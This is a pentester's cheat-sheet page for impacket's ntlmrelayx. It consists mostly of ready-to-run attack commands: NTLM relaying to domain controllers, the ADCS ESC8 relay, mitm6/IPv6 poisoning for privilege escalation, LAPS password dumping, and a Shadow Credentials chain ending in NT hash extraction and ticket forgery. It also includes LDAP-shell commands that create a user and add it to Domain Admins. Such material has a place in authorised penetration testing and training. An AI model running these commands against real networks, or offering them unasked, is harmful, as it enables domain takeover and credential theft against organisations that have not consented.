# ntlmrelayx.py
ntlmrelay is part of [impacket](https://github.com/fortra/impacket).

## Install
I usually use the embedded version in exegol, but that doesn't always play nice, so I like to go:

```
python3 -m venv venv
source venv/bin/activate
python3 -m pipx install impacket
```

Then just run things directly, like:
```
ntlmrelayx
```

## Logging output
```
ntlmrelayx YOUR-COMMANDS --output-file output.log
```

### Add date/timestamp to logs
Add `-ts` somewhere in the command:

```
-ts
```

## Basic vanilla relay
You could, for example, poison network traffic and then relay to a DC to get a "dump" of domain data (where `lootme` is a folder to save dumped data):

```
ntlmrelayx -t ldap://ip.of.a.dc -smb2support -l lootme
```

!!!tip
From this dump you'll get a `domain_users.grep` file.  If you want to make a quick CSV with just AD username and Description fields (to see if any descriptions have mention of `password` or `pass` or `pwd` etc.), you can do:

```
awk -F'\t' 'NR==1 {next} {printf "%s,%s\n", $3, $12}' domain_users.grep > domain_users.csv
```
!!!

## Relaying WPAD/Proxy-Auth connections
If you're using [Responder](/pentesting/internal/responder/) you can get DHCP poisoning going, and then setup ntlmrelayx to listen on port 3128 (thanks to [thehacker.recipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/wpad-spoofing) for this tip):

```
ntlmrelayx -t ldaps://ip.of.a.dc. -i --http-port 3128
```

## Relaying with ADCS ESC8 attack
```
ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
```

## Escalate computer privileges via relay with IPv6 poisoning
If you've already added a computer record to the environment (using something like [powermad](/pentesting/Internal/powermad)), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:

```
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
```

Then, if you've found a system running [WebClient](/pentesting/Internal/webclientservicescanner), you could potentially [coerce](/pentesting/Internal/coercer) authentication to a [DNS record you've added](/pentesting/Internal/dnstool) and pull off the privesc!

## Escalate user account via relay with IPv6 poisoning
```
ntlmrelayx.py -6 -t ldap://ip.of.domain.controller --escalate-user low-priv -wh doesntexist.domain.com -debug
```

## Delegate access attack while poisoning with [mitm6](/pentesting/Internal/mitm6)
```
ntlmrelayx.py -6 -wh doesntexist.domain.com -t ldaps://ip.of.a.domain-controller --delegate-access
```

## Setup SOCKS relay to a list of hosts
In this example we have a `targets.txt` file full of entries like this:

```
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
```

We setup the SOCKS relay like so:

```
ntlmrelayx.py -tf targets.txt -smb2support -socks
```

## Dumping LAPS passwords
If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:
```
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
```

## Shadow Credentials attack
My favorite write-up on this attack is probably [this one from GuidePoint](https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/) security.

### Find hosts with WebClient running
The [webclientservicescanner](/pentesting/Internal/webclientservicescanner) works well for this.

### Add a rogue DNS record pointing to your machine
Try [dnstool.py](/pentesting/Internal/dnstool) for this.

### Setup relay for the Shadow Credentials attack
```
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
```
### Trigger HTTP auth from VICTIM$
Head to our [coercer](/pentesting/Internal/coercer) page for more info.

### Use the PFX to get a TGT
```
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass WHATEVER-PASS-IS domain.com/VICTIM$ cert.ccache
export KRB5CCNAME=cert.ccache
```

This will spit out a bunch of information including the encryption key, which you can then use to extract the NT hash of the machine:
```
getnthash.py -dc-ip IP.OF.A.DC -key XXXENCRYPTION KEY GOES HEREXXX
```

With the NT hash, you can forge a sliver ticket.  First get the SID of the domain.  Below is a way to get that by querying the Administrator account which will give you the domain.  Just be sure in the `ticketer.py` command that follows that you remove the RID (last part of the SID):
```
pywerview.py get-adobject -d domain.com -u lowpriv -p 'password' -t IP.OF.A.DOMAINCONTROLLER --sam-account-name administrator --attributes objectsid
```

Forge the ticket!
```
ticketer.py -domain domain.com -domain-sid xxxBE SURE TO LEAVE OFF THE RID!!!xxx -nthash yyy -spn cifs/VICTIMSYSTEM.domain.com administrator
```

## Shadow Credentials attack (with LDAP shell)
I followed [these instructions to pwn a HBT: Mist machine](https://0xdf.gitlab.io/2024/10/26/htb-mist.html) for this.  

### Get a venv setup
```
python3 -m venv venv
source venv/bin/activate
```

### Install the appropriate impacket fork
```
git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
pip install setuptools
```

### Run ntlmrelayx with sudo permissions:
```
sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -smb2support -t ldap://ip.of.a.dc -i
```

### Interact with the relay
```
nc 127.0.0.1 11000
```

Commands you can use ([this article](https://www.secureideas.com/blog/you-dont-need-pkinit-to-win-it) was helpful):

```
add_computer[computer] [password]
 rename_computer [current_name] [new_name] 
 add_user [new_user]  
 add_user_to_group [user] [group] 
 change_password [user] [password] 
 clear_rbcd [target] 
 disable_account [user]
 enable_account [user] 
 dump 
 search [query] [attributes] 
 get_user_groups [user] 
 get_group_users [group] 
 get_laps_password [computer] 
 grant_control [target] [grantee]
 set_dontreqpreauth [user] [true/false] 
 set_rbcd [target] [grantee] 
 start_tls 
 write_gpo_dacl [user] [gpoSID] 
 whoami 
 dirsync 
 exit 
```

For example, if you want to add a new user and then make them a DA:

```
add_user yermom
add_user_to_group yermom 'Domain Admins'
# Or just regular ol' Administrators
# add_user_to_group yermom Administrators
```

Or if you want to grant control using `set_rbcd` (the syntax is `set_rbcd Target Controlled-Account`)

```
set_rbcd WORKSTATION01$ ADDED-MACHINE-PER-MAQ-SETTING$
```

### Relay to MSSQL with interactive shell
```
ntlmrelayx -t mssql://192.168.7.7 -i -ts -smb2support
```